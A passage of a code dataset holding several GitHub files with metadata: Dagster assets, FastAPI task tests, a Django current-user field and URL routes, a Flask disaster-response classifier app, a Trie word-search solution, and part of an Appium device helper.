dagster_safe_name, generate_description\n\nlogger = get_dagster_logger()\n\n\ndef load_assets(runner: Runner) -> List[AssetsDefinition]:\n \"\"\"\n Load the assets for a runner, each asset represents one tap target combination.\n\n Args:\n runner (Runner): The runner to extract from.\n\n Returns:\n List[AssetsDefinition]: The assets.\n \"\"\"\n\n def run_factory(runner: Runner) -> callable:\n \"\"\"\n Create a run function for a runner.\n\n Args:\n 
runner (Runner): The runner to create a run function for.\n\n Returns:\n callable: The run function that gets executed by Dagster.\n \"\"\"\n\n def run(context: OpExecutionContext) -> Generator[Output, None, None]:\n \"\"\"\n Run a tap target combination.\n\n Args:\n context (OpExecutionContext): The context to run in.\n\n Yields:\n Generator[Output, None, None]: The names of the selected outputs.\n \"\"\"\n # Execute the runner and yield the selected outputs.\n runner.run(\n streams=list(context.selected_output_names),\n logger=logger,\n )\n\n for context_output_name in context.selected_output_names:\n yield Output(\n value=Nothing,\n output_name=context_output_name,\n metadata={\n \"state_path\": f\"{runner.state_manager.base_path}/{runner.state_file_name}\",\n \"state\": runner.load_state(),\n },\n )\n\n return run\n\n return [\n multi_asset(\n name=f\"run_{dagster_safe_name(runner.tap.executable)}_{dagster_safe_name(runner.target.executable)}\",\n outs={\n dagster_safe_name(stream.name): AssetOut(\n is_required=False,\n description=generate_description(runner=runner, stream=stream),\n key_prefix=dagster_safe_name(runner.tap.executable),\n code_version=runner.tap.hash_key,\n )\n for stream in runner.tap.catalog.streams\n if stream.is_selected\n },\n can_subset=True,\n group_name=dagster_safe_name(runner.tap.executable),\n compute_kind=\"python\",\n )(run_factory(runner))\n ]\n", "repo_name": "quantile-development/elx", "sub_path": "elx/extensions/dagster/assets.py", "file_name": "assets.py", "file_ext": "py", "file_size_in_byte": 2639, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "dagster.get_dagster_logger", "line_number": 14, "usage_type": "call"}, {"api_name": "elx.Runner", "line_number": 17, "usage_type": "name"}, {"api_name": "elx.Runner", "line_number": 28, "usage_type": "name"}, {"api_name": "dagster.OpExecutionContext", "line_number": 39, "usage_type": "name"}, {"api_name": "dagster.Output", "line_number": 56, "usage_type": "call"}, {"api_name": "dagster.Nothing", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.Generator", "line_number": 39, "usage_type": "name"}, {"api_name": "dagster.Output", "line_number": 39, "usage_type": "name"}, {"api_name": "dagster.multi_asset", "line_number": 68, "usage_type": "call"}, {"api_name": "elx.extensions.dagster.utils.dagster_safe_name", "line_number": 69, "usage_type": "call"}, {"api_name": "elx.extensions.dagster.utils.dagster_safe_name", "line_number": 71, "usage_type": "call"}, {"api_name": "dagster.AssetOut", "line_number": 71, "usage_type": "call"}, {"api_name": "elx.extensions.dagster.utils.generate_description", "line_number": 73, "usage_type": "call"}, {"api_name": "elx.extensions.dagster.utils.dagster_safe_name", "line_number": 74, "usage_type": "call"}, {"api_name": "elx.extensions.dagster.utils.dagster_safe_name", "line_number": 81, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 17, "usage_type": "name"}, {"api_name": "dagster.AssetsDefinition", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "73917619713", "text": "import random\nfrom typing import Dict\n\nimport pytest\nfrom fastapi.testclient import TestClient\n\nfrom app.api.api_v1.api import tasks as m\nfrom app.config import settings\nfrom tests.utils.utils import random_lower_string\n\n\n@pytest.fixture(scope=\"function\")\ndef mock_controller(mocker):\n return mocker.Mock()\n\n\n@pytest.fixture(scope=\"function\")\ndef mock_db(mocker):\n return 
mocker.Mock()\n\n\n@pytest.fixture(scope=\"function\")\ndef mock_graph_db(mocker):\n    return mocker.Mock()\n\n\n@pytest.fixture(scope=\"function\")\ndef mock_viz(mocker):\n    return mocker.Mock()\n\n\n@pytest.fixture(scope=\"function\")\ndef mock_stats(mocker):\n    return mocker.Mock()\n\n\nclass TestTaskResult:\n    def test_get_task_result(\n        self, mocker, mock_controller, mock_db, mock_graph_db, mock_viz, mock_stats\n    ):\n        task_result_proxy = m.TaskResultProxy(\n            controller=mock_controller,\n            db=mock_db,\n            graph_db=mock_graph_db,\n            viz=mock_viz,\n            stats_client=mock_stats,\n        )\n        user_id = random.randint(1000, 2000)\n        task_hash = random_lower_string(32)\n        task_result_proxy.parse_resp = mocker.Mock(\n            return_value={\"state\": m.TaskState.done, \"task_id\": task_hash}\n        )\n        task = mocker.Mock(hash=task_hash)\n        mocker.patch.object(m, \"ControllerRequest\", return_value=None)\n        result = task_result_proxy.get(task)\n        mock_controller.send.assert_called()\n\n    def test_save_task_result(\n        self, mocker, mock_controller, mock_db, mock_graph_db, mock_viz, mock_stats\n    ):\n        task_result_proxy = m.TaskResultProxy(\n            controller=mock_controller,\n            db=mock_db,\n            graph_db=mock_graph_db,\n            viz=mock_viz,\n            stats_client=mock_stats,\n        )\n        task_result_proxy.get = mocker.Mock()\n        task_hash = random_lower_string(32)\n        task_result_proxy.parse_resp = mocker.Mock(\n            return_value={\"state\": m.TaskState.done, \"task_id\": task_hash}\n        )\n        task_result_proxy.send_notification = mocker.Mock()\n        task_result_proxy.add_new_model_if_not_exist = mocker.Mock()\n        task_result_proxy.add_new_dataset_if_not_exist = mocker.Mock()\n\n        task = mocker.Mock(type=m.TaskType.training)\n        task_result_proxy.update_task_progress = mocker.Mock(return_value=task)\n\n        user_id = random.randint(1000, 2000)\n        task_hash = random_lower_string(32)\n        task = mocker.Mock(hash=task_hash)\n        mocker.patch.object(m, \"ControllerRequest\", return_value=None)\n        result = task_result_proxy.get(task)\n        task_result_proxy.save(task, result)\n\n    def test_get_dataset_info(\n        self, mocker, mock_controller, mock_db, mock_graph_db, mock_stats\n    ):\n        viz = mocker.Mock()\n        keywords = {\"a\": 1, \"b\": 2, \"c\": 3, \"d\": 4}\n        items = list(range(random.randint(10, 100)))\n        viz.get_assets.return_value = mocker.Mock(\n            keywords=keywords, items=items, total=len(items)\n        )\n        proxy = m.TaskResultProxy(\n            controller=mock_controller,\n            db=mock_db,\n            graph_db=mock_graph_db,\n            viz=viz,\n            stats_client=mock_stats,\n        )\n        user_id = random.randint(1000, 2000)\n        task_hash = random_lower_string(32)\n        result = proxy.get_dataset_info(user_id, task_hash)\n        assert result[\"keywords\"] == list(keywords.keys())\n\n\ndef test_get_default_dataset_name():\n    task_hash = random_lower_string(32)\n    task_name = random_lower_string(10)\n    assert m.get_default_record_name(task_hash, task_name) == task_name + \"_\" + task_hash[-6:]\n\n\nclass TestNormalizeParameters:\n    def test_normalize_task_parameters_succeed(self, mocker):\n        mocker.patch.object(m, \"crud\")\n        params = {\n            \"some_classes\": [],\n            \"some_datasets\": [],\n            \"model_id\": 233,\n            \"name\": random_lower_string(5),\n            \"else\": None,\n        }\n        res = m.normalize_parameters(mocker.Mock(), random_lower_string(5), params)\n        assert \"some_classes\" in res\n        assert \"some_datasets\" in res\n        assert \"model_hash\" in res\n\n    def test_normalize_task_parameters_skip(self, mocker):\n        assert (\n            m.normalize_parameters(mocker.Mock(), random_lower_string(5), None) is None\n        )\n\n\nclass TestUpdateStats:\n    user_id = \"0233\"\n\n    def test_update_stats_only_update_task_stats(self, mocker):\n        stats = mocker.Mock()\n        task = 
mocker.Mock(parameters=None)\n        m.update_stats(self.user_id, stats, task)\n        stats.update_task_stats.assert_called()\n        stats.update_model_rank.assert_not_called()\n\n    def test_update_stats_for_model(self, mocker):\n        stats = mocker.Mock()\n        task = mocker.Mock(parameters={\"model_id\": 1})\n        m.update_stats(self.user_id, stats, task)\n        stats.update_model_rank.assert_called_with(self.user_id, 1)\n\n    def test_update_stats_for_dataset(self, mocker):\n        stats = mocker.Mock()\n        task = mocker.Mock(parameters={\"datasets\": [233]})\n        m.update_stats(self.user_id, stats, task)\n        stats.update_dataset_rank.assert_called_with(self.user_id, 233)\n\n\ndef create_task(client, headers):\n    j = {\n        \"name\": random_lower_string(),\n        \"type\": m.TaskType.mining,\n    }\n    r = client.post(f\"{settings.API_V1_STR}/tasks/\", headers=headers, json=j)\n\n    return r\n\n\nclass TestListTasks:\n    def test_list_tasks_succeed(\n        self, client: TestClient, normal_user_token_headers: Dict[str, str], mocker\n    ):\n        req = mocker.Mock(task_id=\"task_id_233\")\n        mocker.patch.object(m, \"ControllerRequest\", return_value=req)\n        for _ in range(3):\n            r = create_task(client, normal_user_token_headers)\n        r = client.get(\n            f\"{settings.API_V1_STR}/tasks/\", headers=normal_user_token_headers\n        )\n        items = r.json()[\"result\"][\"items\"]\n        total = r.json()[\"result\"][\"total\"]\n        assert len(items) == total != 0\n\n\nclass TestDeleteTask:\n    def test_delete_task(self, client: TestClient, normal_user_token_headers, mocker):\n        req = mocker.Mock(task_id=\"task_id_233\")\n        mocker.patch.object(m, \"ControllerRequest\", return_value=req)\n        r = create_task(client, normal_user_token_headers)\n        assert not r.json()[\"result\"][\"is_deleted\"]\n        task_id = r.json()[\"result\"][\"id\"]\n        r = client.delete(\n            f\"{settings.API_V1_STR}/tasks/{task_id}\", headers=normal_user_token_headers\n        )\n        assert r.json()[\"result\"][\"is_deleted\"]\n\n\nclass TestChangeTaskName:\n    def test_change_task_name(\n        self, client: TestClient, normal_user_token_headers, mocker\n    ):\n        req = mocker.Mock(task_id=\"task_id_233\")\n        mocker.patch.object(m, \"ControllerRequest\", return_value=req)\n        r = create_task(client, normal_user_token_headers)\n        old_name = r.json()[\"result\"][\"name\"]\n        task_id = r.json()[\"result\"][\"id\"]\n        new_name = random_lower_string(5)\n        r = client.patch(\n            f\"{settings.API_V1_STR}/tasks/{task_id}\",\n            headers=normal_user_token_headers,\n            json={\"name\": new_name},\n        )\n        assert r.json()[\"result\"][\"name\"] == new_name != old_name\n\n\nclass TestGetTask:\n    def test_get_single_task(\n        self, client: TestClient, normal_user_token_headers, mocker\n    ):\n        req = mocker.Mock(task_id=\"task_id_233\")\n        mocker.patch.object(m, \"ControllerRequest\", return_value=req)\n        r = create_task(client, normal_user_token_headers)\n        name = r.json()[\"result\"][\"name\"]\n        task_id = r.json()[\"result\"][\"id\"]\n\n        r = client.get(\n            f\"{settings.API_V1_STR}/tasks/{task_id}\", headers=normal_user_token_headers\n        )\n        assert r.json()[\"result\"][\"name\"] == name\n\n    def test_get_single_task_not_found(\n        self, client: TestClient, normal_user_token_headers, mocker\n    ):\n        task_id = 2333\n        r = client.get(\n            f\"{settings.API_V1_STR}/tasks/{task_id}\", headers=normal_user_token_headers\n        )\n        assert r.status_code == 404\n", "repo_name": "IJtLJZ8Rm4Yr/ymir-backend", "sub_path": "src/pymir-app/tests/api/test_task.py", "file_name": "test_task.py", "file_ext": "py", "file_size_in_byte": 8018, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": 
"61", "api": [{"api_name": "pytest.fixture", "line_number": 12, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 17, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 22, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 27, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 32, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.TaskResultProxy", "line_number": 41, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 41, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 48, "usage_type": "call"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 49, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.TaskState", "line_number": 51, "usage_type": "attribute"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 51, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 54, "usage_type": "argument"}, {"api_name": "app.api.api_v1.api.tasks.TaskResultProxy", "line_number": 59, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 59, "usage_type": "name"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 67, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.TaskState", "line_number": 69, "usage_type": "attribute"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 69, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks.TaskType", "line_number": 75, "usage_type": "attribute"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 75, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 78, "usage_type": "call"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 79, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 81, "usage_type": "argument"}, {"api_name": "random.randint", "line_number": 88, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.TaskResultProxy", "line_number": 92, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 92, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 99, "usage_type": "call"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 100, "usage_type": "call"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 106, "usage_type": "call"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 107, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.get_default_record_name", "line_number": 108, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 108, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 113, "usage_type": "argument"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 118, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.normalize_parameters", "line_number": 121, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 121, "usage_type": "name"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 121, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.normalize_parameters", "line_number": 128, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 128, "usage_type": "name"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 128, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.update_stats", "line_number": 138, "usage_type": 
"call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 138, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks.update_stats", "line_number": 145, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 145, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks.update_stats", "line_number": 151, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 151, "usage_type": "name"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 157, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.TaskType", "line_number": 158, "usage_type": "attribute"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 158, "usage_type": "name"}, {"api_name": "app.config.settings.API_V1_STR", "line_number": 160, "usage_type": "attribute"}, {"api_name": "app.config.settings", "line_number": 160, "usage_type": "name"}, {"api_name": "fastapi.testclient.TestClient", "line_number": 167, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 167, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 170, "usage_type": "argument"}, {"api_name": "app.config.settings.API_V1_STR", "line_number": 174, "usage_type": "attribute"}, {"api_name": "app.config.settings", "line_number": 174, "usage_type": "name"}, {"api_name": "fastapi.testclient.TestClient", "line_number": 182, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 184, "usage_type": "argument"}, {"api_name": "app.config.settings.API_V1_STR", "line_number": 189, "usage_type": "attribute"}, {"api_name": "app.config.settings", "line_number": 189, "usage_type": "name"}, {"api_name": "fastapi.testclient.TestClient", "line_number": 196, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 199, "usage_type": "argument"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 203, "usage_type": "call"}, {"api_name": "app.config.settings.API_V1_STR", "line_number": 205, "usage_type": "attribute"}, {"api_name": "app.config.settings", "line_number": 205, "usage_type": "name"}, {"api_name": "fastapi.testclient.TestClient", "line_number": 214, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 217, "usage_type": "argument"}, {"api_name": "app.config.settings.API_V1_STR", "line_number": 223, "usage_type": "attribute"}, {"api_name": "app.config.settings", "line_number": 223, "usage_type": "name"}, {"api_name": "fastapi.testclient.TestClient", "line_number": 228, "usage_type": "name"}, {"api_name": "app.config.settings.API_V1_STR", "line_number": 232, "usage_type": "attribute"}, {"api_name": "app.config.settings", "line_number": 232, "usage_type": "name"}]} +{"seq_id": "26858688632", "text": "import warnings\n\nfrom django.conf import settings\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom django_currentuser.middleware import get_current_authenticated_user\n\n\nclass CurrentUserField(models.ForeignKey):\n\n warning = (\"You passed an argument to CurrentUserField that will be \"\n \"ignored. 
Avoid args and following kwargs: default, null, to.\")\n description = _(\n 'as default value sets the current logged in user if available')\n defaults = dict(null=True, default=get_current_authenticated_user,\n to=settings.AUTH_USER_MODEL)\n\n def __init__(self, *args, **kwargs):\n self.on_update = kwargs.pop(\"on_update\", False)\n\n # If `to` is present in kwargs, and the same when ignoring case then\n # update `to` to use the defaults.\n # Fix for https://github.com/zsoldosp/django-currentuser/issues/43\n if \"to\" in kwargs \\\n and kwargs[\"to\"].lower() == self.defaults['to'].lower():\n kwargs[\"to\"] = self.defaults['to']\n\n self._warn_for_shadowing_args(*args, **kwargs)\n\n if \"on_delete\" not in kwargs:\n kwargs[\"on_delete\"] = models.CASCADE\n\n if self.on_update:\n kwargs[\"editable\"] = False\n kwargs[\"blank\"] = True\n\n kwargs.update(self.defaults)\n super(CurrentUserField, self).__init__(**kwargs)\n\n def deconstruct(self):\n name, path, args, kwargs = super(CurrentUserField, self).deconstruct()\n if self.on_update:\n kwargs['on_update'] = self.on_update\n del kwargs[\"editable\"]\n del kwargs[\"blank\"]\n\n return name, path, args, kwargs\n\n def pre_save(self, model_instance, add):\n if self.on_update:\n value = get_current_authenticated_user()\n if value is not None:\n value = value.pk\n setattr(model_instance, self.attname, value)\n return value\n else:\n return super(CurrentUserField, self).pre_save(model_instance, add)\n\n def _warn_for_shadowing_args(self, *args, **kwargs):\n if args:\n warnings.warn(self.warning)\n else:\n for key in set(kwargs).intersection(set(self.defaults.keys())):\n if not kwargs[key] == self.defaults[key]:\n warnings.warn(self.warning)\n break\n", "repo_name": "zsoldosp/django-currentuser", "sub_path": "django_currentuser/db/models/fields.py", "file_name": "fields.py", "file_ext": "py", "file_size_in_byte": 2399, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 134, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.models.ForeignKey", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 9, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 13, "usage_type": "call"}, {"api_name": "django_currentuser.middleware.get_current_authenticated_user", "line_number": 15, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 31, "usage_type": "name"}, {"api_name": "django_currentuser.middleware.get_current_authenticated_user", "line_number": 51, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 61, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "27969879086", "text": "import uuid\nfrom django.urls import path\nfrom . 
import views\n\napp_name = 'mealshop'\n\nurlpatterns = [\n path('', views.index, name='index'),\n # Employees menu request\n path('menu/', views.menu, name='menu'),\n path('/choose_menu/', views.choose_menu, name='choose_menu'),\n path('/add_order', views.add_order, name='add_order'),\n path('view_orders/', views.view_orders, name='view_orders'),\n path('/add_order_customizations',\n views.add_order_customizations, name='add_order_customizations'),\n # Menu paths\n path('create_menu/',\n views.create_menu, name='create_menu'),\n path('add_menu/',\n views.add_menu, name='add_menu'),\n path('/update_daily_menu',\n views.update_daily_menu, name='update_daily_menu'),\n path('daily_menu/', views.daily_menu, name='daily_menu'),\n path('/create_reminder', views.create_reminder,\n name='create_reminder'),\n # Menu Option paths\n path('/menu_option/',\n views.menu_option, name='menu_option'),\n path('/add_customization/',\n views.add_customization, name='add_customization'),\n path('menu_options/',\n views.menu_options, name='menu_options'),\n path('add_menu_option/',\n views.add_menu_option, name='add_menu_option')\n]\n", "repo_name": "omabena/learn-django", "sub_path": "mealshop/app/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1387, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 29, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "15961624998", "text": "import json\nimport plotly\nimport pandas as pd\nfrom plotly.graph_objects import Bar, layout, Layout\nfrom plotly.subplots import make_subplots\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\ninit_notebook_mode(connected=True)\n\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\n\nfrom flask import Flask\nfrom flask import render_template, request, jsonify\nimport joblib\nfrom sqlalchemy import create_engine\n\n\napp = Flask(__name__)\n\ndef tokenize(text):\n \"\"\"\n Tokenizing the input text (together with lemmatizer, lowering the letters and stripping the text from unneeded spaces)\n \n INPUT:\n text - a string for tokenization\n \n OUTPUT:\n clean_tokens - a list of tokenized words\n \"\"\"\n tokens = word_tokenize(text)\n lemmatizer = WordNetLemmatizer()\n\n clean_tokens = []\n for tok in tokens:\n clean_tok = lemmatizer.lemmatize(tok).lower().strip()\n clean_tokens.append(clean_tok)\n\n return clean_tokens\n\n# load 
data\nengine = create_engine('sqlite:///../data/DisasterResponse.db')\ndf = pd.read_sql_table('messages', engine)\n\n# load model\nmodel = joblib.load(\"../models/classifier.pkl\")\n\n# index webpage displays cool visuals and receives user input text for model\n@app.route('/')\n@app.route('/index')\ndef index():\n # data for the distribution graph\n genre_counts = df.groupby('genre').count()['message']\n genre_names = list(genre_counts.index)\n \n # data for the subplots graph\n genre_unique = df['genre'].unique()\n plotting_df = pd.melt(df, id_vars=['genre'], value_vars=df.columns[3:])\n plotting_df = plotting_df.groupby(['genre', 'variable']).sum().reset_index()\n \n # graph number 2\n fig1 = make_subplots(rows=genre_unique.shape[0], cols=1, print_grid=False, subplot_titles=genre_unique)\n \n i=1\n for genre in genre_unique:\n data=plotting_df[plotting_df['genre']==genre]\n fig1.add_trace(Bar(x=data['variable'], y=data['value'], opacity=0.5, marker=dict(color='#F1C40F')), row=i, col=1)\n i+=1\n \n # cleaning the layout of the graphs\n layout_custom = layout.Template(\n layout=Layout(titlefont=dict(size=24, color='#34495E'))\n )\n \n fig1['layout'].update(title='Messages by genre and category', \n showlegend=False,\n template=layout_custom)\n \n fig1['layout']['yaxis1'].update(hoverformat=',d', tickformat=',d')\n fig1['layout']['yaxis2'].update(hoverformat=',d', tickformat=',d')\n fig1['layout']['yaxis3'].update(hoverformat=',d', tickformat=',d')\n fig1['layout']['xaxis1'].update(visible=False)\n fig1['layout']['xaxis2'].update(visible=False)\n \n # graph number 1\n graphs = [\n {\n 'data': [\n Bar(\n x=genre_names,\n y=genre_counts,\n opacity=0.5, \n marker=dict(color='#F1C40F')\n )\n ],\n\n 'layout': {\n 'template': layout_custom,\n 'title': 'Distribution of Message Genres',\n 'yaxis': {\n 'title': \"Count\"\n },\n 'xaxis': {\n 'title': \"Genre\"\n }\n }\n }]\n \n graphs.append(fig1)\n \n # encode plotly graphs in JSON\n ids = [\"graph-{}\".format(i) for i, _ in enumerate(graphs)]\n graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)\n \n # render web page with plotly graphs\n return render_template('master.html', ids=ids, graphJSON=graphJSON)\n\n\n# web page that handles user query and displays model results\n@app.route('/go')\ndef go():\n # save user input in query\n query = request.args.get('query', '') \n\n # use model to predict classification for query\n classification_labels = model.predict([query])[0]\n classification_results = dict(zip(df.columns[4:], classification_labels))\n\n # This will render the go.html Please see that file. 
\n return render_template(\n 'go.html',\n query=query,\n classification_result=classification_results\n )\n\n\ndef main():\n app.run(host='0.0.0.0', port=3001, debug=True)\n\n\nif __name__ == '__main__':\n main()", "repo_name": "MortaV/Udacity_Disaster_Response", "sub_path": "app/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 4254, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "plotly.offline.init_notebook_mode", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 18, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 30, "usage_type": "call"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.read_sql_table", "line_number": 42, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.melt", "line_number": 57, "usage_type": "call"}, {"api_name": "plotly.subplots.make_subplots", "line_number": 61, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 66, "usage_type": "call"}, {"api_name": "plotly.graph_objects.layout.Template", "line_number": 70, "usage_type": "call"}, {"api_name": "plotly.graph_objects.layout", "line_number": 70, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Layout", "line_number": 71, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 88, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 112, "usage_type": "call"}, {"api_name": "plotly.utils", "line_number": 112, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 115, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 122, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 122, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 129, "usage_type": "call"}]} +{"seq_id": "1640102722", "text": "from typing import List\n\n\nclass Trie:\n\n def __init__(self):\n self.children = {}\n self.word = ''\n\n def add_word(self, word):\n cur = self\n for char in word:\n if char not in cur.children:\n cur.children[char] = Trie()\n cur = cur.children[char]\n cur.word = word\n\n\nclass Solution:\n def findWords(self, board: List[List[str]], words: List[str]) -> List[str]:\n root = Trie()\n for word in words:\n root.add_word(word)\n\n ROWS, COLS = len(board), len(board[0])\n res, visit = set(), set()\n directions = [[-1, 0], [1, 0], [0, -1], [0, 1]]\n\n def dfs(r, c, trie_node):\n if r not in range(ROWS) or c not in range(COLS) or (r, c) in visit or board[r][c] not in trie_node.children:\n return\n\n visit.add((r, c))\n char = board[r][c]\n node = trie_node.children[char]\n if node.word:\n res.add(node.word)\n\n for dx, dy in directions:\n dfs(r + dx, c + dy, node)\n\n visit.remove((r, c))\n\n for r in range(ROWS):\n for c in range(COLS):\n dfs(r, c, root)\n\n return list(res)\n\n\nif __name__ == '__main__':\n board = [[\"a\",\"b\"],[\"c\",\"d\"]]\n words = [\"abcb\"]\n print(Solution().findWords(board, words))", "repo_name": "amogchandrashekar/Leetcode", "sub_path": "Hard/Word Search II.py", "file_name": "Word Search II.py", "file_ext": "py", "file_size_in_byte": 1365, "program_lang": "python", "lang": "en", "doc_type": 
"code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "9444736788", "text": "#coding=utf-8\n#author='Shichao-Dong'\n\nimport time, os\nfrom appium import webdriver\nfrom comm.Log import Logger\nfrom selenium.common.exceptions import WebDriverException\nfrom comm.StartAppiumServer import Sp\nfrom comm.readConfig import ReadConfig\n\nconf = ReadConfig()\nlog = Logger()\n\napp_path = os.path.join(os.path.abspath(os.path.join(os.getcwd(), \"../..\")), 'UI-Test', 'comm', 'apps', 'cibn.apk')\nplatformName = conf.get_config('platformName')\nappPackage = conf.get_config('appPackage')\nappActivity = conf.get_config('appActivity')\nappium_port = conf.get_config('appium_port')\n\nclass webDriver:\n def __init__(self):\n self.get_device = conf.get_cmd('viewDevices')\n self.get_Version = conf.get_cmd('platformVersion')\n self.startServer = conf.get_cmd('startServer')\n\n def get_deviceName(self):\n values = os.popen(self.get_device).readlines()\n print(values)\n dev = values[1].split()[0]\n if len(values)-2 == 1:\n print(dev)\n log.info('可用设备为:'+ dev)\n return dev\n else:\n log.warn('暂未获取到可用设备')\n print('No device found')\n\n def get_platformVersion(self):\n values = os.popen(self.get_Version).readlines()\n # log.info('系统版本号为:'+ str(values))\n if values != '':\n Version=values[0].split('=')[1]\n print(Version)\n log.info('可用设备版本号为:'+Version)\n return Version.strip()\n 